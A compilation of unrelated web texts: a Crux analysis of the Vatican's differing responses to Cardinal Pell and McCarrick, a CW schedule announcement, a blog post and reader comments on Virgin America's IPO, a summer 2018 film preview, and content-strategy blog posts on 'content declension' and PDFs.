In addition, Piedmont will get a CivicSpark Fellow — a college graduate intern — for 11 months to assist the staff in accomplishing the city’s climate action goals. City staff will screen candidates who will work for the Local Government Commission in conducting the program. The intern will be paid $18,400, which is provided by East Bay Energy Watch, with Piedmont paying $5,000.
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Vatican contrast on Pell, McCarrick driven by doubt about guilt
In News Analysis
Although the cases of Theodore McCarrick and Cardinal George Pell may seem similar, there's one big difference: So far, the Church's reformers on abuse aren't convinced Pell is guilty.
ROME – Like virtually everyone in Catholic circles, the Vatican has known since December about Cardinal George Pell’s conviction in his native Australia for alleged sexual offenses against two minor boys in 1996. As a result, Rome was not at all caught off guard when news of the conviction made the rounds Tuesday, after a gag order was lifted.
The statement read aloud to reporters Tuesday by Vatican spokesman Alessandro Gisotti was not, therefore, cobbled together under tight deadline pressure. On the contrary, officials had three months to ponder what they wanted to say when the moment came.
That truth makes it all the more striking how little the statement actually said – no word about any Church trial of Pell, nothing about taking away his cardinal’s red hat or expelling him from the Catholic priesthood, all of which happened to Theodore McCarrick of the United States in what, in Church terms, was the mere blink of an eye.
How does one explain the difference? It’s actually fairly simple: Early on, senior officials were convinced of McCarrick’s guilt. With Pell, they still aren’t.
Over the last couple of days, Crux has spoken with some of the Catholic Church’s leading reformers on clerical sexual abuse, inside the Vatican and out. To be clear, these are not people automatically inclined to give accused clergy the benefit of the doubt, and several are figures who actually dislike some of Pell’s political and theological stances as well as what’s often see as his fairly bruising personality.
Nonetheless, they’ve expressed skepticism that Pell is actually guilty of the crimes with which he was charged and convicted.
The irony is that the people in the Vatican most inclined to welcome Pell’s conviction aren’t really reformers on sexual abuse, but those lukewarm about house-cleaning on the financial front who resented Pell’s challenge to the status quo during his brief tenure as the Vatican’s financial czar.
For those wondering about Pell’s guilt, their ambivalence isn’t rooted exclusively in the generic belief that Pell wouldn’t do it, although many who know the 77-year-old prelate find it hard to swallow. On the other hand, reformers are also well aware that operating on gut instinct and solidarity with fellow clerics is a good part of what got the Church into trouble in the first place, and that experience has shown every accusation has to be taken seriously.
Instead, the doubts are based on the allegations themselves, which require one to believe that an archbishop known as a fusspot for liturgical rules inexplicably broke protocol to head for the sacristy behind the cathedral altar on a busy Sunday. Normally accompanied by aides but at that moment strangely alone, according to the charge, Pell then discovered two choirboys, also by themselves, sexually abused both boys while still wearing his cumbersome liturgical vestments (which cannot be parted in the ways described in the testimony), and then returned to greeting Mass-goers, all without ever being observed by the host of people who constantly move in and out of the sacristy on such an occasion.
As Australian Jesuit Father Frank Brennan, who attended the trial, has written, “The proposition that the offenses charged were committed immediately after Mass by a fully robed archbishop in the sacristy with an open door and in full view from the corridor seemed incredible to my mind.”
Further, Pell’s conviction came in a second trial after his first trial in August ended with a hung jury. Ten of those twelve jurors were ready to acquit, leaving people to wonder about how such a dramatic swing was possible from one trial to the next.
There’s also the politics of Australia to consider, where, due to negative media coverage and his own combative disposition, Pell occupies roughly the same spot in public opinion as Osama bin Laden did in the United States post-9/11. (Yes, that’s an exaggeration, but only slightly.) For some, there are questions about whether a fair trial was really possible.
This background helps explain why the statement on Tuesday was relatively non-committal, saying only that the Vatican would await the results of an appeal while “recalling that Cardinal Pell has confirmed his innocence and has the right to defend himself to the last stage of appeal.”
The statement did indicate that the normal restrictions imposed on clergy accused of abuse, including suspension from public ministry and any contact with minors, remain in force. Gisotti also confirmed later in the day that Pell’s term as Secretary of the Economy had expired, and while neither of those points amount to throwing Pell under the bus, they’re not exactly a ringing endorsement either.
If Pell’s conviction is upheld and convincing evidence emerges that solidifies belief in his guilt, he’ll no doubt face the same fate as McCarrick, and the Vatican will face the same hard questions about who knew what and when. Pope Francis was compelled to promise a thorough review of the Vatican’s archives on McCarrick, and he’d almost certainly have to do the same thing on Pell.
In the minds of many of the people responsible for such decisions, however, that moment has not yet come with George Pell – and therein lies the difference between two cases which, otherwise, may seem remarkably similar.
Victim in Cardinal Pell’s sex abuse case speaks out
Vatican says it will await results of Pell’s appeal of sex abuse conviction
Australian Cardinal Pell faces abuse sentencing hearing
Alessandro Gisotti
Cardinal George Pell
sacristy
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Filed Under:CWfall
The CW’s Newest Superhero “Batwoman” and “Supergirl” Create A Powerful Team for An Action-Packed Sunday Night
Family Bonds Grow Strong on Monday Night With “All American” followed by “Black Lightning”
The CW’s Original Superheroes “The Flash” and “Arrow” Are Back-To-Back on Tuesday
The “Riverdale” Phenomenon Continues Wednesdays Paired With The CW’s New Series “Nancy Drew” at 9
“Supernatural” Returns to Thursday for Its Final Season, Leading Into “Legacies” at 9
“Charmed” Heads to a New Night on Fridays at 8 Followed By “Dynasty”
The CW Network presented its new Fall schedule for the 2019-20 season at the City Center in New York today.
“The CW heads into next season riding a wave of creative momentum and expansion, with more original programming all year round, and a new Fall line-up boasting scripted series in every single time period across our six-night schedule. We have 14 returning series for next year and adding to that three exciting new shows, including our newest superhero, the thrilling BATWOMAN, the mystery and suspense of NANCY DREW and the aspirational KATY KEENE, based on the Archie Comics characters,” said Mark Pedowitz, President, The CW. “As the original multiplatform network, combining our linear broadcast and our best in class Adsupported digital services with our ability to harness social like no one else, The CW’s distinct
THE CW’S 2019 FALL PRIMETIME SCHEDULE – Page 2
Following is The CW’s Fall Primetime Schedule for the 2019-2020 Season and accompanying details on all the programs.
Art is available online at http://www.cwtvpr.com, as well as the latest releases, biographies and other relevant press information for all The CW’s programs
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Virgin America Wants to Go Public, But Will People Buy It?
CF on Jul 30, 2014 Jul 31, 2014 - 51 Comments on Virgin America Wants to Go Public, But Will People Buy It?
Since the dawn of time, or, uh, the dawn of Virgin America, the airline has planned to go public. There has always just been one little problem. Virgin America was losing tons and tons of money. But after 7 years of flying (one of them profitable), the airline has decided the time has come. Virgin America filed its S-1 with the Securities and Exchange Commission (SEC) indicating that an initial public offering (IPO) is on its way. Will anyone want to actually buy the stock?
The great thing about an S-1 is that it provides all kinds of fun details, explaining why a stock will be a great investment. In this case, it tries to lay out the case for Virgin America. Ultimately, however, investors want to know if they are going to make money on a stock. And that means believing the story the company is telling.
Looking backwards, Virgin America has had a couple good quarters, posting its first full year profit last year. But that does not make for a solid track record. And the airline knows that. Take a look at this statement under the doom-and-gloom “Risk Factors” section, which is an entertaining read in any company’s filing.
We have a limited operating history and have only recorded one year of profit, and we may not sustain or increase profitability in the future.
We have a history of losses and only a limited operating history upon which you can evaluate our business and prospects. While we first recorded an annual profit in 2013, we cannot assure you that we will be able to sustain or increase profitability on a quarterly or an annual basis. In turn, this may cause the trading price of our common stock to decline and may materially adversely affect our business.
Yeah. That. But, Virgin America says, it has a sustainable business model that enables the airline “to compete effectively with other low-cost carriers, or LCCs, by generating higher revenue per available seat mile, or RASM, but at a cost per available seat mile, or CASM, comparable to that of other LCCs.”
Unless I’ve lost the ability to do basic math, if your costs are the same and your revenue is higher, then you shouldn’t be lagging in profitability compared to your competitors. Virgin America posted a 5.7 percent operating margin last year. For Virgin America, that’s stellar, but it lags every other LCC in the US.
You’ll notice I’m using operating margin and not net margin. There’s a reason for that, and it’s directly tied to how Virgin America wants to use this IPO money. See, Virgin America will use a big chunk of the proceeds (though we don’t know how much is being raised in total) to pay off the debt that has kept the airline flying over the years. That means the Virgin Group will get its $400 million back (in exchange for some other favors) and Cyrus Capital will get $250 million. The interest payments on that money comes outside of operating income, so while retiring the debt would help profitability, it wouldn’t help the underlying fundamentals of the airline’s business.
For what it’s worth, I don’t blame Cyrus Capital for wanting to get its money back. Virgin America has restructured its debt several times over the years (the biggest reason, along with lower fuel prices, why the airline actually posted a profit last year), but Cyrus has remained in the mix. Now the time has come, if Virgin America can convince potential investors to buy stock. But those investors know that there’s not much to see looking backwards. Let’s look forward to see if things are indeed looking rosy enough.
Virgin America has styled itself as a low cost, high revenue kind of airline, but as we’ve already seen, its costs aren’t low enough and its revenue isn’t high enough.
On the cost side, it says it has a low cost structure due to a young fleet, single fleet type, and high utilization. But looking forward, young fleets get older and more expensive to maintain. And unless there’s a big change in planned operations, that “high utilization” thing is a myth. Virgin America’s aircraft utilization has steadily dropped from 12.7 hours a day in 2010 to 10.8 hours a day in 2013. That’s not high utilization.
The airline will rely on growth to keep its costs down and to get more scale so that unit revenues increase as the airline becomes more capable of serving business travelers on a wider variety of routes. Virgin America has 53 airplanes today, but starting next July, the airline will take 10 new airplanes within 12 months. (That may very well be why Virgin America needs this IPO now, to pay for those suckers.)
The problem is, however, that Virgin America doesn’t have a ton of places to put these airplanes. Sure, there will be a little going to Dallas to grow the airline’s new Love Field operation. But Virgin America is capped at 2 gates and much of the flying is just being transferred from Dallas/Ft Worth. Most of the rest is being funded by cutting existing flights elsewhere, like Philadelphia. So that’s not really a growth thing.
Instead, Virgin America makes it clear in the S-1 that it expects future growth to happen in its hubs in both LA and San Francisco, but how? There are gate constraints in both places, and I’m not convinced there are a bunch more markets out there that need A320s in them anyway. In general, LA is about to become a bloodbath with American now seeming dead-set on building its Asian gateway there. San Francisco may be better, but how many routes can you think of that make sense? Most are probably other airline hubs, and that doesn’t usually work out so well.
Growth is one thing, but then you also have to look at prospects for the existing operation. Other airlines are ramping up on routes where Virgin America has done well. Most importantly, the JFK-LA and SF markets do really well for Virgin America, but it’s been an arms race to create the best product there. Virgin America now has the worst seat in the premium cabin on that route. Meanwhile, JetBlue is really ratcheting up pressure with its Mint business class offering. Regardless of whether it’s good for JetBlue, it can’t be good for Virgin America as fares are low. And there’s a chance that product will expand to other markets.
The only real saving grace here for Virgin America is if the economy continues to hum as it does today. The domestic market is really, really strong so fares are high. If you think this is going to continue like this for years, then that would bode well for Virgin America’s success. But look at the history of this industry and the good times don’t tend to last all that long. Maybe it’ll be different this time with all the consolidation that’s happened. And maybe the big airlines will get too greedy and create enough of a fare canopy to allow Virgin America to thrive. If enough people believe that, then this might be an interesting IPO.
[Virgin America aircraft photo via Chris Parypa Photography, Wesley Snipes photo via Featureflash, and Richard Branson photo via s_bukley / Shutterstock.com]
51 comments on “Virgin America Wants to Go Public, But Will People Buy It?”
*** says:
I will signal my great faith in this IPO by purchasing one share. :)
Nick Barnard says:
I will signal my lack of faith in this IPO by shorting one share.
Sanjeev M says:
If they do SFO-IAH/ATL/DEN/SLC/STL/DTW then I think they suddenly become relevant for enough business travelers to switch over from UA or WN.
Wow; thanks for thinking of STL! We’re so used to living in airline obscurity, it’s almost startling when somebody mentions us anymore…
SFO-ATL/DTW/SLC will be a war with DL and DL will beat them back. B6 couldn’t do SFO – SLC and it wasn’t for lack of trying. SFO-IAH/DEN is UA and I don’t know how equipped they would be to stop that. SFO-STL could work. Their F product is better than UA and it’s a long enough flight to enjoy sleeping in the seat or watch a movie on the seatback screens.
Sanjeev – Those markets are tough ones to make work. Not only are they all other airline hubs (excluding St Louis), but they just aren’t huge high revenue markets. I’m sure that has to be on the roadmap (along with Hawai’i), but I just wonder if they can support Virgin America service.
the challenge is how long and how much capital needs to be invested for that to happen? That’s a lot of markets which will require a few flights per day each. The ramp up will eat millions of dollars in marketing costs and low yield / low loads. VX doesn’t have a cash cow, and its a problem.
B6 can fuel growth with carribbean / dominican flights with little or no competition, high yields, and quick ramp up. Alaska has the state all by itself. Spirit cherry picks routes and adds/drops as needed. Allegiant chooses airports with no competition. I dont understand how VX wants to enter high competitive, low yield cities, with low frequency and expect to steal premium traffic and outperform….
“How do you make a million dollars in the airline industry? You invest $100 million.”
Maybe some of the tech billionaires in the bay area who fly in their private jets, will buy some stock so their workers can have a jazzier airline to fly on besides the old UA/DL/AA sisters of the sky.
Southeasterner says:
If only they were a tech stock and then they wouldn’t even have to worry about annoying things like earnings and profits.
The only benefit I could see to buying Virgin stock is the potential for a takeover by JetBlue, Alaska, or one of the majors, who would probably be more interested in their landing slots than operations.
Seth Miller says:
Couldn’t agree more re the <a href="http://blog.wandr.me/2014/07/virgin-america-ipo-filing-strength-weakness/"utilization and growth at SFO/LAX issues for Virgin America. There’s also the part where they claim to be targeting business travelers but don’t really know how to classify them (they chose tix bought inside 14 days) and even when they do pick that metric they’re only seeing 30% of seats and 40% of revenue from that pool. Those numbers significantly trail the bigger players in the market.
Adding 10 planes in the next couple years will help them in terms of more options for more markets to serve, but they still need to figure out slots/gates at LAX/SFO and where to actually go with the planes. DAL has no growth potential either. It is really hard to figure what the business model is on this one.
DesertGhost says:
A few thoughts: Investment decisions will be about more than where Virgin America flies or its current operating margin. It will be about the perceived future. It will also depend on how the proceeds will affect the balance sheet (how much debt will be paid off), the initial offering price, the amount raised versus the enterprise (book) value of the company, etc.
I think your point about airline consolidation and capacity discipline is spot on. The airline industry is viewed favorably on Wall Street now, especially given the stock buyback programs and dividends the major airlines are initiating. Another part of the equation could be a future merger or buyout. Lots of people love to invest hoping for such an event, even though that’s usually not a good reason to buy stock in a company. There are probably enough institutional investors who view the airline industry favorably to make the IPO work.
IO says:
DG – I agree on the “perceived future” comment. I think it is speculative investment which depends on the items you and CF mention. I think that short term the industry/domestic conditions are the main drivers while long-term is the potential for a merger or sell/buy of the airline. I ventrue to write that the partners in the latter may be either jetblue or american. jetblue due to similar fleet/west coast weakness (off the table if Jetblue joins with Alaska) and american to establish a dueling Asian hub, IMO.
The overall market strength (despite today’s selloff) is also a factor. IPOs are easier when the stock market is strong.
Tory says:
“LA is about to become a bloodbath with American now seeming dead-set on building its Asian gateway there”
Would love to see a post with more details on this American Asian gateway initiative…
Tory – I wish I had details but I don’t. I just know that they’ve been publicly talking about this. Doug Parker brought this up again at the GBTA conference this week in his talk. He said that that LAX will be their gateway. Seems ill-advised to me, but I guess we’ll now have the chance to find out.
Cool. When you hear more details, I’m looking forward to the post. Maybe a VP over there would be willing to give you a briefing?…
It will really be interesting to see how AA-LAX vs. UA-SFO vs. DL-SEA plays out…
With Seattle and San Francisco “spoken for” what alternative does American have? Of course, the devil will be in the details.
P.S. That is, of course, other than the alternative to do nothing.
I don’t agree entirely with your SFO is “spoken for” statement. If that were the case then virgin america would not have launched in the first place. true, they’ve lost money and battle United, but they are there. if american were to buy virgin american then it could add int’l service and perhaps adopt some of virgin america standard of service and apply int’l and be an alternative to United, IMO. again, just saying it is possible.
astra says:
I think he was referring to SFO being “spoken for” as an Asian gateway, which it most certainly is for UA.
DesertGhost – Who says you have to have a west coast gateway to Asia? American has already started building up DFW which is great for the southeast. There’s also opportunity in Chicago and other hubs. The cities that are big enough can have service that way.
From the west, focus on feeding the JAL hub in Tokyo. Put 787s into all kinds of markets, starting with Phoenix. You have a joint venture partner over there so you have great feed opportunities. If a city is big enough then it can get a nonstop to the US. But otherwise, Tokyo should work. (Delta might have felt the same way if it didn’t have to feed itself in Tokyo.)
I didn’t. That’s why I mentioned the option to do nothing in the P.S. I wrote. But I do like your thoughts on the subject. Makes a lot of sense.
I don’t think it’s practical to route Asian traffic through Tokyo. Most of the US-Asia traffic is going to/from the large coastal cities like LA and SF. Why fly via Tokyo when you can fly direct on some other airline? If AA wants to make headway in Asia, they need a west coast gateway.
I agree that LAX will be more difficult to establish as a west coast hub for AA given that there are 3 large competitors. I think SFO is more likely to be their hub in the long run because it would only be a 2 competitor race.
I’m not suggesting this is a reason to buy the stock, but the one thing Virgin America MIGHT have going for it is the really poor customer service of the legacy airlines. Compared to everyone else, Virgin America has a cooler, more high tech, customer friendly approach that may help keep the seats filled.
And thus, Cranky’s comment from a couple years ago describing VX as “the airline everybody wants to fly and nobody wants to own”.
I want to live in a world where airlines that people want to fly do well economically…..just not enough to invest in Virgin America.
JetGuy says:
The only thing that would make this a bigger joke would be if the Kardashians were involved.
VX claims it wants to serve the business traveler, yet on most routes lacks the frequency to be a credible competitor. VX failed to develop its SFO home hub into a hub that could truly compete with UA. VX’s first class cabin is overkill for shorter flights – and consumes a huge amount of cabin real estate.
VX must also pay a hefty licensing fee to Virgin Group for use of the Virgin name. I question whether that fee – and the Virgin name – is really worth it. JetBlue, after all, created an excellent brand without needing the crutch provided by a third-party.
Virgin America offers a nice, if increasingly expensive product, but it is at best a marginal business with limited potential absent some major shake-ups to its business strategy and, possibly, management.
If VX had any original route ideas out of SFO or LAX, they might be worth investing. However, they seem to want to serve the same routes that the legacies do without the frequency of the legacies. I would not put any money into this airline.
That’s the problem with setting up your base at another airline’s hub: All the good routes are already served by the other airline.
Here’s to wishful thinking that CVG-LAX and CVG-SFO are on their radar. DL serves both routes with 737s and A320s. Those flights are always full and that’s with DL pricing those directs through the roof. If F9 can fill an A320 daily to DEN, I’m wondering why VX can’t make a go of either or both of LAX and SFO from CVG. A year ago, I would have suggested MCO and FLL as well, but G4 is already reaping the benefits of adding those routes.
Overpar56 says:
CVG/lLAX and CVG/SFO would be a good fit. I’m tired of creaky and worn 737s and Airbus 320s DL flys on this route.
Chihchuan says:
i am wobndering why dont they collaborate with HW?
HW can focus on west coast and asia market while virgin group operate the domestic routes.
As a moderately frequent business and leisure traveler with SFO as my home airport, I tend not to fly VX despite the superior customer service because:
-VX charges change fees, WN doesn’t
-DL has a good ” economy plus legroom” offering with reasonable pricing / availability, VX doesn’t
– VX does not fly to the southeast (except FL which does not count)
– WN has the flight frequency to make same day minor airport west coast out-and-back work, VX does not
TMartin says:
Please don’t forget, network carriers like AA/UA/DL, use places like LAX as a hub and reply more on connecting traffic than local traffic (which Virgin is after). For example, DFWLAX has AA, DL, UA, NK, VX, and WN. AA is more interested in feeding DFW and LAX hubs than local traffic, DL and UA, have limited flights to connect with their LAX Hub, WN (although they claim not to have hubs), will have a fair amount of connections at LAX and DAL, so VX and NK are the only two carriers specifically interested in ‘LOCAL’ traffic (O&D).
In fact, everyone I talk to that flies VX say once they fly VX, they don’t go back to their OA, especially with several AA frequent fliers. My observation, is VX needs better revenue management. Most of the pax that fly VX are willing to pay more, even if AA or OA are less, and I don’t think they have recognized the opportunity to increase revenue.
I truly believe they have a huge niche and a very loyal customer base, that’s willing to pay a little more (even if OA is less!). Once their revenue management recognizes that, and takes advantage of it, they will be consistently profitable!
Other carriers do have connecting traffic, but they still have a lot of local traffic at LAX as well, especially for LAX-JFK and other transcontinental routes. Also, much of the connecting traffic is to Asia or Hawaii, so carrying connecting passengers is a strength, not a weakness, for those carriers.
I, for one wouldn’t pay extra to fly VX, especially since DL and AA have been greatly improving their transcontinental flights recently, and B6 has always been pretty good, although UA still sucks. When it was launched, the product was new and fancy, but now it’s pretty similar to what the others have, but with mood lighting. The flights I’ve had with them were certainly fine, but honestly, I have much more faith in traditional carriers for what happens when there are delays or cancellations as well, since more flights, more slots, more aircraft, and a larger network are all in their favor.
AA flies 736 PDEWS in LAXDFW which is more than all other carriers COMBINED.
planedoc says:
you know what its just amazing to find an airline in the middle east that hubs its operations and has the largest fleet of A380s and wide body jets to serve in a hub city that is just 31,229 less than the Metropolitan Statistical Area of Cincinnati Ohio can do so amazingly well for just being a transfer airline only along with being a gateway to UAE. How ironic that the International Civil Aviation Organization (ICAO) code for the airline is UAE along with the International Air Transport Association (IATA) code being EK possibly meaning with E standing for Emirati (the demonym name) along with K standing for the last name of Ra’s al-khaimah (or Julfar) of a staging post that was used during an Islamic invasion of sasanian Iran in 637 that happen during the battle of the Ridda Wars. I sure hate to be openly gay and travel there perhaps. but with that all aside would it be nice if VX had that kind of money that the UAE has at its disposal? well then u have Richard Branson but that airline has to pay him for the naming right of Virgin and its brand so that’s not much of a help there. but with them going public this could very well be a good thing perhaps or better yet a very bad thing as another airline that dose not have the virgin brand at hart as an opportunity to eliminate a competition and grow there own along by eliminating the brand if ownership of the airline has been upheld by an buyer to the most shares of the company. so who knows what could soon happen tho this airline as time goes on.
you know what its just amazing that I have absolutely no idea what you’re trying to say in your post.
Although it’s apt to be a terrible investment, somehow these turkeys also seem to get enough buyers to get public. It’s telling that most of the funds are going to go pay out current investors, they don’t want to own it, either.
Why is LAX such a worse TPAC hub for AA than SFO is for UA? It’s a few miles further out of the way than SFO but really not all that much further, especially as you got deeper into China. And LAX has far fewer inbound delays than does SFO. SFO has competition from airlines like CX SQ OZ BR almost as much as LAX. If AA T4 gets connected to the TBIT post security, it could work for them. AA really doesn’t have much alternative if they want to develop TPAC service from the West Coast. And LAX is certainly a better connecting hub than DFW for the western half of the country.
Carl – There really is a geographical issue. Going from, say, Denver to Tokyo via LAX requires flying 3.5% more miles. That might not sound like a lot, but in this business, that makes a big difference.
But the bigger issue is that LAX just has a ton more competition, especially from Asian carriers that aren’t as price-disciplined. I think about things like the China Southern A380 to Guangzhou, and the now more than daily Philippine flights to Manila. The double daily Air China flights to Beijing don’t help either, neither does the double daily A380 on Korean to Incheon. I could go on and one, but these airlines keep prices relatively low.
It’s telling that most of the funds are going to go pay out current investors, they don’t want to own it, either.
While I understand why people keep saying this, it also the damn silliest statement I’ve ever heard about an IPO. IPO’s are SUPPOSED to repay the original investors. That’s the point of the damn thing. Do you think Facebook investors invested simply to sit on their stocks in perpetuity?
You misunderstand the purpose of most IPOs and of the stock market. While there aren’t any restrictions on the use of funds from an IPO, in most IPOs the capital that is raised in the IPO is used to fund growth of the business. In some cases a portion of the funds is used to cash out current investors. When the majority of the cash is used to cash out current investors that is generally considered a warning sign that the current investors do not have confidence in the company or the market. They are presumed to have better knowledge of the company than new public investors. If the prospects were bright, they would want to retain their ownership, and capital would be put into the company.
Nonsense. Investors cash out because that’s the point, especially for many early investors who have, by the point of an IPO, seen their initial investment grow appreciably. Yes, depending on the company the IPO may be to initially raise capital for the company to fuel growth, but the inevitable end game is always, at some likely in the near future, to cash out.
No, that’s not the primary point of an IPO or of the capital markets. They facilitate a variety of transactions, in particular raising new capital for a company that needs it. If the existing investors want to cash out, they can simply sell the entire company. And existing investors can also sell their shares in the public markets after an IPO, potentially after a lockup period and after any SEC-required holding times.
The vast majority of IPOs are to sell new shares, not to cash out existing investors.
Well, the paperwork that’ll be filed should make it clear what is happening. If VX is issuing new shares (or selling treasury shares) or if its just to allow the existing shareholders to sell out.
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Kailash Mansarovar Yatra says:
In some cases a portion of the funds is used to cash out current investors.
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JetBlue’s Call Center Marketing Advantage Over Virgin America (Guest Post)
Guest Posts, JetBlue, Virgin America
This Week on BNET (March 9 – 13)
787, AirTran, Alaska Airlines, BNET, Delta, Inflight Entertainment, United, US Airways, Virgin America
Virgin America Surprises with Significant Changes
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The 30 Hottest Films of Summer 2018
From Deadpool to The Meg to Slenderman, beat the heat with these heroes and villains
by Dominick Suzanne-Mayer,Michael Roffman,Blake Goble and Matt Melis
Ryan Reynolds as Deadpool
Page 1Page 2Page 3Page 4Page 5Page 6Page 7Page 8Page 9Page 10Page 11
When we sat down to kick off this year’s summer movie preview, it felt just a little bit off. After all, Avengers: Infinity War has already opened, in April at that, and it may well be the biggest movie of the summer. But it’s also hardly the only one desperately hoping to earn that title.
As always, summer 2018 is rife with a mix of mega-budget studio tentpoles custom-built to put investors at ease while thrilling audiences the world over and would-be breakout indie hopefuls. Already-acclaimed material sits aside unproven entities, and as always, there’s at least one movie on the docket that we’re not sure will actually come out on time.
But there’s something for everybody, and it’s already getting warm, so why not let us walk you through the hottest stuff you’ll be checking out for the sake of keeping cool? See you at the movies.
–Dominick Suzanne-Mayer
Release Date: May 18th via 20th Century Fox
At a brisk 77 minutes, Stuart Little 2 is a tiny miracle. It’s a fuzzy, feel-good family film for all ages. The 2002 adventure comedy (with then-state-of-the-art computer animation) holds up like you wouldn’t believe. And this mouse was no louse. Michael J. Fox is the titular hero in the far-from-ratty sequel …
Wait, I was supposed to write about Deadpool 2?
Wow, I was really off on this one. We have got to fix Google Sheets!
Anyway, Deadpool 2 opens May 18th. Production troubles. Juvenile meta humor. First one was a runaway hit. YMMV. —Blake Goble
Release Date: May 18th via A24
Paul Schrader’s recent filmography might include its share of inexplicable curiosities (The Canyons), but he’s back in peak form with First Reformed, a fanged character study about a struggling, grief-struck preacher (Ethan Hawke) whose life is changed irreparably when he comes into contact with a radical environmentalist and his terrified wife. This is Schrader in full Taxi Driver form, examining faith and salvation in worlds full of savagery. It’s hardly the kind of escapist stuff some moviegoers seek in the summer months, but it’s the kind of movie that’s going to stay with you when so much popcorn fare has come and gone. —Dominick Suzanne-Mayer
Calm down, incels. If you’re looking for dating advice, find another site. We’re talking groovy movies! About aliens and punk boys! This one’s the grand, glittery, galactic return of John Cameron Mitchell (Hedwig and the Angry Inch). It’s a welcome showing from one of our favorite cult figures, and working off a script based on a short from Neil Gaiman, How to Talk to Girls at Parties has real teen cult potential. We’re talking Repo Man meets Can’t Hardly Wait meets My Stepmother is an Alien. Okay, that’s a tad much, but we’re interested in this offbeat romance all the same. —Blake Goble
Release Date: May 25th via Disney
Now that we’ve seen a full trailer, some television spots, and a full meal from Denny’s, the hype machine for Solo: A Star Wars Story has gone into hyperspace. Although past reports suggested Disney had a total piece of garbage on their hands, all signs point to a genuine adventure from Willow director Ron Howard, whose candid social media presence ahead of the film makes it all that much easier to forget this ever belonged to Phil Lord and Christopher Miller. And the more and more we see Alden Ehrenreich and Donald Glover as Han Solo and Lando Calrissean, respectively, the more we’re willing to “punch it” to May 25th ourselves. Here’s hoping Chewie gets some great lines. –Michael Roffman
Elijah Bynum
John Cameron Mitchell
Morgan Neville
Rafael Casal
Taylor Sheridan
Trevor Jackson
Florence & the Machine announce new album, High as Hope, share “Hunger”: Stream
Conan O’Brien’s TBS talk show downsizes to half-hour episodes in 2019, pivots to digital content
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Content Declension: Adaptive content for the Hierarchy of Information Needs
by: rsgracey - August 29th, 2013 Filed under: Content Modeling, Content Strategy, Information Architecture, User Experience Design
Last week, I wrote a piece called, “A Hierarchy of Information Needs.” It described one way to think about how an information seeker’s question, problem, or interest at any moment can, in effect, blind him or her to other content, no matter how it’s formatted, nor how much the content’s creator wants it to be seen. Usually, the need for the “ephemera” of life becomes the dire matter to be resolved first.
That got me thinking about how else one might use the idea of a hierarchy, which led me to this pondering:
Consider how often a content owner would like for your content to be the most important thing in front of an information seeker at a moment. Let’s say, further, that the content is a full, well-created, powerful “story,” which will bring lasting value to the information seeker, if only you could get it to shift down the hierarchy, from “story” to “reference,” to “ephemera.” If only your content could be fleeting, you reason, and if it could wink out of existence as soon as it’s served its purpose, then it would be seen, explored, and valued in all its fullness and glory.
Content “Declension,” or manifesting your content at each level of the “Hierarchy of Information Needs”
I’m going to call this process—of setting off a content cascade through the hierarchy—“Content Declension,” which I will further call just one process of “Content Grammar.”
In many languages (other than English), nouns “decline” to suit the context in which they’re used. They take different prefixes and suffixes, and sometimes they take on entirely different forms, in order to communicate their role in a sentence, roles that are called “cases.” As a basic example of how this process works, you’ll recognize the vestiges of this process in English:
He is the subject, and the subject is about him, and his story is fascinating.
(Nominative case he declines to dative case him, and then to genitive case his…)
OK, it’s a thin example, but Content Declension is the process of establishing patterns and formats for the different cases (or “contexts”) in which your content appears.
When you are creating content, it is vital to consider how it will be able to satisfy your information seekers’ most immediate needs, while providing paths deeper into the whole content. In one sense this is about creating useful, meaningful abstracts of your content, but it’s also about establishing consistent formats for each level, so that no matter what the underlying content, it will be clear how it all fits together, and where you are at each level of the content’s inherent “hierarchy.”
Let me use a blog post as an obvious example. This is easy-peasy on a printed page, since the article appears in a fixed position and format. In digital publication, however, the content declensions are complex.
When we think of the full article, standing alone on an HTML page, the answer is easy: We have the full “Story” form, with all its parts, in all their glory: All the text, the byline, the images and videos, as well as the comments, contact links for the author, and perhaps legal information, too.
At the side, however, is another box, called “Related Stories,” which is a “Reference” content component. With a glance, you can see other content you may want to read, but you don’t have to go there if you don’t want to. Inside that container are the stories’ “Ephemera” declensions. They probably include the headline, a thumbnail, a lead-in blurb, and maybe the byline. It just depends on how the designers chose the elements.
So all together, in this example, we have to plan three declensions of the same content: The full Story, the Reference, and the Ephemera— the same content, in three case forms.
It is vital to consider all the contexts in which your content will appear to the information seeker: In sidebar lists, in search results, in printed documents, in content links, and even in URLs. The more you can plan for the contexts in which your content appears, the better you can present it in a form (and format) that will suit the seeker’s present need.
Why is this important? It’s another step in making your content “adaptive” in preparation for “responsive design.”
But there are contexts, and there are contexts.
For the content of our time, there are infinite possibilities for what content is going to show up where, on what platform, in what physical context, and on and on, as we as content strategists are painfully aware. We have also been introduced recently to “responsive design” as a method of resolving some of that uncertainty and “adaptive content” as a way to teach the content about itself, so it can communicate its topics and other meta-properties to the design, so that it can shift.
But I would say that there is an additional property that we have not yet systematized, which is “content context.”
What happens when this content is called as a “link?” What do you, the content designer, want to present as the properties in the link?
What if the “link” is in a “related links” container? Should it be the same “link” as when it appears in the “Search Results” list? How can the metadata communicate which content ephemera should appear when it appears in one context or another?
How can we ensure that when this story is called from a blog post, it declines in one way, and when it’s called from a Twitter feed, it declines differently?
What if you want to provide hooks for other contexts, so that related content is served up in some contexts, but not others, when someone else is specifying the display?
A Call for the Next Evolution of Standards: Content Grammar
Content declension, as a standard, would need to address two issues. First, it would require that content experience designers imaging the functions and contexts in which a full version of content might appear, so that a responsive design could address differences in display for different contexts.
But it would also require that we establish a standard system to name these contexts, like any other evolution of markup. We would need to say that a link.related-links would be different from a link.search-results, to be followed by the fields, attributes, or properties that should appear in those cases. Something like that.
As Content Strategy is evolving, we are uncovering new questions and puzzles related to the “substance” of the digital universe, and I think this is an important next phase, like the “semantic web,” we might call it the “grammatical web.” I expect that if we sit here some more and think at it long enough, we’ll come up with more “Content Inflections,” like “Conjugations.”
The PDF Tar Pits: Where content is trapped, struggles, sinks, and dies…
by: rsgracey - August 26th, 2013 Filed under: Content Modeling, Content Strategy, User Experience Design 2 Comments
I’m working on a small government web project at the moment, and I was asked to assess the content to propose some content types. As I have looked across the landscape, there were very few content types, really. But then, as I continued my survey, I noticed these suspicious, dark black patches. I couldn’t see beneath their surface, so I started probing, moving closer…THEN, I was caught in sticky, black goo that started to pull me under, as panic rose in my throat…
Caught in the PDF Tar Pits
